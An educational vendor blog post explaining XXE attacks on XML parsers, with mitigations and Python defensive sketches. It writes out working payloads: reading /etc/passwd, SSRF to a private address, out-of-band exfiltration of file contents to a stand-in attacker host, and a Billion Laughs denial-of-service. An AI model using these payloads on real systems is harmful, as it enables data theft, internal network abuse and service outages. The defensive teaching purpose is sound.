An XML (Extensible Markup Language) External Entity or XXE attack occurs when an attacker is able to exploit the application’s processing of XML data by injecting malicious entities. An application is vulnerable when it faithfully includes and processes the referenced external entity regardless of its origin, permitting the injection attack to succeed. In order to really understand the vulnerability, we will need to look at how XML is constructed and used, how vulnerabilities in parsers can be exploited, and summarise how best to prevent XXE injection attacks.
We will start by taking a step back and reviewing what XML is and where it’s used, in order to present the context for how vulnerabilities may be introduced.
A challenge encountered relatively early in the history of computing was the requirement, driven initially by early publishing software, to provide document templating, layout and typesetting within a homogeneous document format – precursor requirements for today’s WYSIWYG (“what you see is what you get”) software used in web applications such as blogs. Later developments led to a clear distinction between the structure and the presentation of documents.
An early example (a markup language known as Scribe) is shown below. Its “markup” syntax uses commands beginning with “@” characters to provide distinguishing annotation that separates instructions on document structure from the actual text. When the document is processed for display, the markup itself is not shown and is only used to format the text:
@Heading(The Beginning)
@Begin(Quotation)
Let's start at the very beginning, a very good place to start
@End(Quotation)
Extensible Markup Language (XML) is a more modern markup language that emerged in the late 1990s, coinciding with the widespread adoption of the internet and the world wide web in domestic and commercial contexts. Like its precursors, XML defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. It is still widely used in a number of areas.
Let’s take a look at a basic XML example:
<?xml version = "1.0" encoding = "UTF-8" standalone = "yes"?>
<userInfo>
  <firstName>John</firstName>
  <lastName>Doe</lastName>
</userInfo>
This probably looks fairly familiar in that it is similar to a basic HTML document, which is no coincidence since both HTML and XML are ultimately derived from the same root – SGML (Standard Generalized Markup Language).
In this next example we have a slightly more complicated XML document that includes a DTD (the <!DOCTYPE foo [ ... ]> block):
<?xml version = "1.0" encoding = "UTF-8" standalone = "yes"?>
<!DOCTYPE foo [
  <!ENTITY NEWSPAPER "The Example">
  <!ENTITY PUBLISHER "Example Press Ltd">
]>
<userInfo>
  <firstName>John</firstName>
  <lastName>Doe</lastName>
</userInfo>
The <!DOCTYPE foo [ ... ]> block forms what is called the Document Type Definition, or DTD. This is a precursor to the main body of the document that follows. The DTD consists entirely of data that is outside of both markup and content that will be rendered. In this basic example it supplies just two entities. However, a DTD can contain a more substantial set of declarations relating to the document structure, with a list of elements and attributes.
Entities are similar to the variables used in programming languages. They permit an XML document to store (or retrieve) information that is used later in the document. The entity declaration assigns the entity a value that is retained throughout the document. Entities act largely to provide data normalisation: reducing duplication and the possibility of typos, ensuring consistency, reducing document size and improving legibility for human readers of an XML document. In general, there are two types: internal and external. We will look at a simple internal entity example first:
<?xml version = "1.0" encoding = "UTF-8" standalone = "yes"?>
<!DOCTYPE foo [
  <!ENTITY firstName "John" >
  <!ENTITY lastName "Doe" >
]>
<userInfo>
  <firstName>&firstName;</firstName>
  <lastName>&lastName;</lastName>
</userInfo>
Here we have defined an entity “firstName” and then referred to it later in the actual document by inserting the entity name preceded by an ampersand (&) and followed by a semicolon (;). When the document is parsed, each reference is replaced with the entity’s value, resulting in the following data structure:
<userInfo>
  <firstName>John</firstName>
  <lastName>Doe</lastName>
</userInfo>
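The expansion described above can be reproduced with a short sketch. This assumes Python's standard-library xml.etree.ElementTree parser, which the article itself does not mention. The helper name expand_user_info is hypothetical and only illustrates that internal entity references are replaced during parsing.

```python
import xml.etree.ElementTree as ET

# The internal-entity document from above, passed as bytes so that the
# parser reads the encoding from the XML declaration itself.
DOCUMENT = b"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [
  <!ENTITY firstName "John">
  <!ENTITY lastName "Doe">
]>
<userInfo>
  <firstName>&firstName;</firstName>
  <lastName>&lastName;</lastName>
</userInfo>"""


def expand_user_info(document: bytes) -> dict:
    """Parse the document and return each child element's expanded text."""
    root = ET.fromstring(document)
    return {child.tag: child.text for child in root}


if __name__ == "__main__":
    print(expand_user_info(DOCUMENT))  # {'firstName': 'John', 'lastName': 'Doe'}
```

The application code never sees "&firstName;". By the time the element tree is available, the parser has already substituted the declared value.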
External entities are slightly more complex in that they allow reference to external storage objects (objects outside the context of the document itself) by means of an identifier known as a URI that provides their source (e.g. “https://www.example.com/john.xml”). Here is an example:
<?xml version="1.0" standalone="no" ?>
<!DOCTYPE foo [
  <!ENTITY ent SYSTEM "https://www.example.com/john.xml">
]>
<userInfo>&ent;</userInfo>
When parsed, the content of https://www.example.com/john.xml is included in the data structure.
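To make the internal/external distinction concrete, here is a minimal sketch that lists the entities a document declares and where each one gets its value. It assumes Python's standard-library xml.parsers.expat module. The function name list_entities and the combined sample document are hypothetical, chosen for illustration. No external resource is fetched, because no external entity handler is installed.

```python
import xml.parsers.expat

# Illustrative document declaring one internal and one external entity.
SAMPLE = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE foo [
  <!ENTITY firstName "John">
  <!ENTITY ent SYSTEM "https://www.example.com/john.xml">
]>
<userInfo>&firstName;</userInfo>"""


def list_entities(document: bytes) -> list:
    """Return (name, kind, source) for each entity declared in the DTD."""
    found = []

    def on_entity_decl(name, is_parameter, value, base,
                       system_id, public_id, notation):
        if system_id is not None:
            # External entity: its value lives at the SYSTEM URI.
            found.append((name, "external", system_id))
        else:
            # Internal entity: its value is given inline in the DTD.
            found.append((name, "internal", value))

    parser = xml.parsers.expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(document, True)
    return found


if __name__ == "__main__":
    for entry in list_entities(SAMPLE):
        print(entry)
```

An audit step like this only reports what a document asks for. Whether the URI is actually retrieved depends on how the parser is configured.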
By now, hopefully it is becoming clear what can go wrong. You’ll be sat there with your “attacker” hat on, thinking “but what if we could control where the entity reference pointed?”
XXE vulnerabilities arise because the XML specification contains these external entity references, parsers often enable these features by default (or the developer may have enabled them intentionally), and user controlled XML data is submitted to the parser. These flaws can potentially be used to extract data, execute a remote request from the server, scan internal systems, perform a denial-of-service attack, as well as execute other attacks.
These vulnerabilities all arise because typically an attacker is in control of the XML document presented to the system, in a client-server interaction. In a typical HTTP interaction, a user (client) submits a relatively simple request for a resource or document on the server – the request contains little more than the HTTP verb and protocol version, the path, optionally some headers and parameters. It is only the server that gets to respond with a richly formatted HTML-format document.
In typical XML applications, however, a client will commonly send an XML payload as part of their request and the server will pass the payload through an XML parser. A malicious attacker is able to replace the external entity values the system expects with values pointing outside the context that the system naively assumes input will be limited to, or to insert entities that were not expected at all. Let’s take a look at some specific examples of how external entities can be exploited if the attacker has control over the document generation:
In a file disclosure attack, the attacker inserts a URI into their submitted XML payload that makes use of a scheme (e.g. “http://” or “file://”) and path (e.g. “/etc/passwd”) that are outside the context that the developer of the system was expecting. In this instance they choose to have the entity refer to a local file scheme and path rather than to the intended remote URL endpoints, for example:
<?xml version="1.0" standalone="no" ?>
<!DOCTYPE replace [
  <!ENTITY entity SYSTEM "file:///etc/passwd">
]>
<userInfo>
  <firstName>John</firstName>
  <lastName>&entity;</lastName>
</userInfo>
The above example is intended by its developer to simply substitute a last name from an entity. However, an attacker has altered the XML document so that the parser reads a file that defines system users from the local filesystem of the system processing the XML document, and includes its content in the lastName field.
Server Side Request Forgery (SSRF) occurs when an attacker can cause the server to make a request to another service dictated by the attacker. See our previous post for a more detailed discussion of SSRF.
There are several areas within the XML specification that permit the document to specify a URI which the parser will request when processing the document, one of which is within the XML external entities. For example, the following document will cause a vulnerable system to request http://10.1.2.3/users/delete/all:
<?xml version="1.0" standalone="no" ?>
<!DOCTYPE replace [
  <!ENTITY entity SYSTEM "http://10.1.2.3/users/delete/all">
]>
<userInfo>
  <firstName>John</firstName>
  <lastName>&entity;</lastName>
</userInfo>
Note that it does not matter if the response from the HTTP request is included in the response to the user in this attack, as the objective is to cause the server to issue the HTTP request.
The advantage this provides the attacker is that the vulnerable system may have a more privileged position in relation to the target. In the example above, 10.1.2.3 is a private network address which the vulnerable system can access on its network, but which the attacker cannot reach directly across the internet.
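The difference between the entity targets seen so far can be sketched with a small classifier. This uses Python's standard-library urllib.parse and ipaddress modules. The function describe_system_identifier and its category labels are hypothetical, and the check is an illustration rather than a complete defence (it does not resolve DNS names, for instance).

```python
import ipaddress
from urllib.parse import urlparse


def describe_system_identifier(uri: str) -> str:
    """Classify an entity's SYSTEM URI by what the parser would reach."""
    parts = urlparse(uri)
    if parts.scheme == "file":
        return "local file"
    host = parts.hostname
    if host is None:
        return "unknown"
    try:
        address = ipaddress.ip_address(host)
    except ValueError:
        # A DNS name: where it resolves to is not checked in this sketch.
        return "named host"
    return "private address" if address.is_private else "public address"


if __name__ == "__main__":
    for uri in ("file:///etc/passwd",
                "http://10.1.2.3/users/delete/all",
                "http://ASDF123.example.com/"):
        print(uri, "->", describe_system_identifier(uri))
```

The second URI is reported as a private address, which is exactly why the request is valuable to an attacker: only the vulnerable server is positioned to make it.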
Another variant of this attack is to specify a domain under the attacker’s control and monitor for DNS and HTTP requests which indicate that the system is processing the entity. In the following example the attacker would own example.com and monitor for DNS and HTTP requests for ASDF123.example.com. Since the only place ASDF123.example.com is referred to is in their payload, any request received shows that the entity has been processed and the system is vulnerable.
<?xml version="1.0" standalone="no" ?>
<!DOCTYPE replace [
  <!ENTITY entity SYSTEM "http://ASDF123.example.com/">
]>
<userInfo>
  <firstName>John</firstName>
  <lastName>&entity;</lastName>
</userInfo>
In classic XXE attacks with the aim of recovering data, the system needed to serve the parsed XML document back to the user in order to be considered vulnerable. However, a more recent technique is to make use of parameter entities to construct an entity which will send the file content to the attacker’s server out of band, sidestepping the requirement to return the data to the user in band.
A parameter entity has a similar syntax to a regular entity. The pertinent differences are that it is declared and referenced using % rather than &, and that it can only be used within the DTD.
One method of using this technique is as follows:
The attacker hosts a file such as the following:
<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % param1 "<!ENTITY external SYSTEM 'http://example.com/log_xxe?data=%payload;'>">
And then sends this payload to the server:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
  <!ENTITY % remote SYSTEM "http://example.com/xxe_1">
  %remote;
  %param1;
]>
<foo>&external;</foo>
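When this payload is parsed, the system will fetch the attacker’s hosted file from http://example.com/xxe_1, read /etc/passwd into the parameter entity “payload”, expand “param1” to declare the entity “external” with a URL that embeds the file content, and finally request that URL when &external; is resolved, delivering the file content to the attacker’s server.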
Another XML attack to be aware of (technically not XXE, since the entities are not external to the DTD) is a Denial of Service (DoS) attack against the processing service endpoint via entity manipulation. One simple form is an “entity unpacking” attack, which uses nested entity references to produce an exponentially long string. This is usually referred to as a Billion Laughs attack or XML bomb.
<?xml version="1.0" ?>
<!DOCTYPE refs [
  <!ENTITY ref1 "ref">
  <!ENTITY ref2 "&ref1;&ref1;&ref1;&ref1;&ref1;&ref1;&ref1;">
  <!ENTITY ref3 "&ref2;&ref2;&ref2;&ref2;&ref2;&ref2;&ref2;">
  <!ENTITY ref4 "&ref3;&ref3;&ref3;&ref3;&ref3;&ref3;&ref3;">
  <!ENTITY ref5 "&ref4;&ref4;&ref4;&ref4;&ref4;&ref4;&ref4;">
  <!ENTITY ref6 "&ref5;&ref5;&ref5;&ref5;&ref5;&ref5;&ref5;">
  <!ENTITY ref7 "&ref6;&ref6;&ref6;&ref6;&ref6;&ref6;&ref6;">
  <!ENTITY ref8 "&ref7;&ref7;&ref7;&ref7;&ref7;&ref7;&ref7;">
  <!ENTITY ref9 "&ref8;&ref8;&ref8;&ref8;&ref8;&ref8;&ref8;">
]>
<tag>&ref9;</tag>
In the attack type seen in this example, the tag contains a reference to the entity “ref9”. The parser diligently looks up the contents of ref9 and finds that it contains 7 instances of ref8, which in turn contains 7 instances of ref7, and so on down to ref1. To build the concatenated string for ref9, the parser has to concatenate 7^8 copies of “ref”, which is 5,764,801 strings in total. In attempting to process this, the parser may run out of memory or, in more complex variants, simply consume valuable CPU capacity.
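The growth can be checked with a few lines of arithmetic. This is a sketch in Python. The function name expanded_copies is hypothetical, and it assumes the layout used in the document above: the first entity holds the base string and each later entity references the previous one a fixed number of times.

```python
def expanded_copies(levels: int, fan_out: int) -> int:
    """Copies of the base string produced by expanding the last entity.

    The first entity holds the base string itself; each of the remaining
    (levels - 1) entities references the previous one `fan_out` times.
    """
    return fan_out ** (levels - 1)


# The document above: ref1..ref9, seven references per entity.
copies = expanded_copies(levels=9, fan_out=7)
print(copies)               # 5764801
print(copies * len("ref"))  # 17294403 characters after expansion

# Ten references per entity across ten levels gives the figure
# that the "Billion Laughs" name refers to.
print(expanded_copies(levels=10, fan_out=10))  # 1000000000
```

A document of well under a kilobyte therefore expands to roughly 17 MB, and adding one more level multiplies that by seven again.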
Alternatively, an entity that attempts to read from an object that is addressable via a standard file path URI and provides an unlimited stream of random characters, such as /dev/urandom on a Linux system, may also cause a denial of service.
The best fix for XXE and DTD vulnerabilities is relatively simple: external entities and DTDs are not typically needed within most systems and can be safely disabled server-side via a parser configuration parameter. Newer versions of XML processors and libraries often disable these by default.
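As one illustration of such a configuration parameter, the sketch below uses Python's standard-library xml.sax parser and switches off external general and parameter entities through its feature flags. The choice of xml.sax is an assumption made for this example, not something the article prescribes. The TextCollector class and parse_without_external_entities function are hypothetical names, and other parsers expose equivalent settings under different names.

```python
import io
import xml.sax
from xml.sax.handler import (ContentHandler, feature_external_ges,
                             feature_external_pes)

# The file disclosure payload shown earlier in the article.
PAYLOAD = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE replace [
  <!ENTITY entity SYSTEM "file:///etc/passwd">
]>
<userInfo>
  <firstName>John</firstName>
  <lastName>&entity;</lastName>
</userInfo>"""


class TextCollector(ContentHandler):
    """Collect the character data seen directly inside each element."""

    def __init__(self):
        super().__init__()
        self.text = {}
        self._stack = []

    def startElement(self, name, attrs):
        self._stack.append(name)
        self.text.setdefault(name, "")

    def endElement(self, name):
        self._stack.pop()

    def characters(self, content):
        if self._stack:
            self.text[self._stack[-1]] += content


def parse_without_external_entities(document: bytes) -> dict:
    """Parse with external general and parameter entities switched off."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)
    parser.setFeature(feature_external_pes, False)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(document))
    return handler.text


if __name__ == "__main__":
    result = parse_without_external_entities(PAYLOAD)
    print(repr(result["firstName"]), repr(result["lastName"]))
```

With the features disabled, the reference to &entity; is skipped rather than resolved, so the lastName element comes back empty instead of containing the file. Setting the flags explicitly, rather than relying on library defaults, keeps the behaviour the same across versions.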
If External Entities are required and user input is used to form an XML document rather than the XML document originating from the user, then the protection measures that may be effective are those used in preventing other injection attacks relying on untrusted user input, such as SQL Injection and Cross Site Scripting (XSS).
You should sanitise input, ideally against a type, or if not then against a whitelist regex of allowed values. If you’re asking for someone’s name, for instance, you could allow only upper case and lower case letters plus a few other characters, since there are no names with “<” in them.
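A whitelist check of this kind might look like the following sketch. The pattern is an assumption made for illustration (ASCII letters plus apostrophe, hyphen and space, with an arbitrary 64-character limit), and the function name is_valid_name is hypothetical. A real application would need a character set that suits the names it has to accept.

```python
import re

# Hypothetical whitelist: a leading letter, then letters, apostrophes,
# hyphens or spaces, up to 64 characters in total.
NAME_PATTERN = re.compile(r"[A-Za-z][A-Za-z' -]{0,63}")


def is_valid_name(value: str) -> bool:
    """Return True only if the whole value matches the whitelist."""
    return NAME_PATTERN.fullmatch(value) is not None


if __name__ == "__main__":
    for candidate in ("John", "O'Brien", "&entity;", "Doe<!ENTITY x"):
        print(repr(candidate), is_valid_name(candidate))
```

Using fullmatch rather than search matters here: the entire value has to conform, so markup characters such as "<", "&" and ";" are rejected wherever they appear.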
However, this is simpler for some parameters and form fields than others. If you are processing a parameter representing a numeric item ID, then simply checking the type is an integer may be simple and sufficient. For other data that is richer, this is more difficult, and sanitisation is of more limited value for such parameters – when you sanitise input, you risk altering the data in ways that might make it unusable. Input sanitisation is therefore generally avoided in cases where the nature of the data is unknown, such as free-form text entry fields, especially if these may legitimately contain complex data sets such as code samples.
Developer training is also highly beneficial in order to raise awareness of how to identify and mitigate XXE.
AppCheck helps you by providing assurance across your entire organisation’s security footprint. AppCheck performs comprehensive checks for a massive range of web application vulnerabilities from first principles to detect vulnerabilities, including XML External Entity vulnerabilities, in in-house application code. AppCheck also draws on checks for known infrastructure vulnerabilities in vendor devices and code from a large database of known and published CVEs. The AppCheck Vulnerability Analysis Engine provides detailed rationale behind each finding, including a custom narrative to explain the detection methodology, verbose technical detail and proof of concept evidence through safe exploitation.
As always, if you require any more information on this topic or want to see what unexpected vulnerabilities AppCheck can pick up in your website and applications then please get in contact with us: firstname.lastname@example.org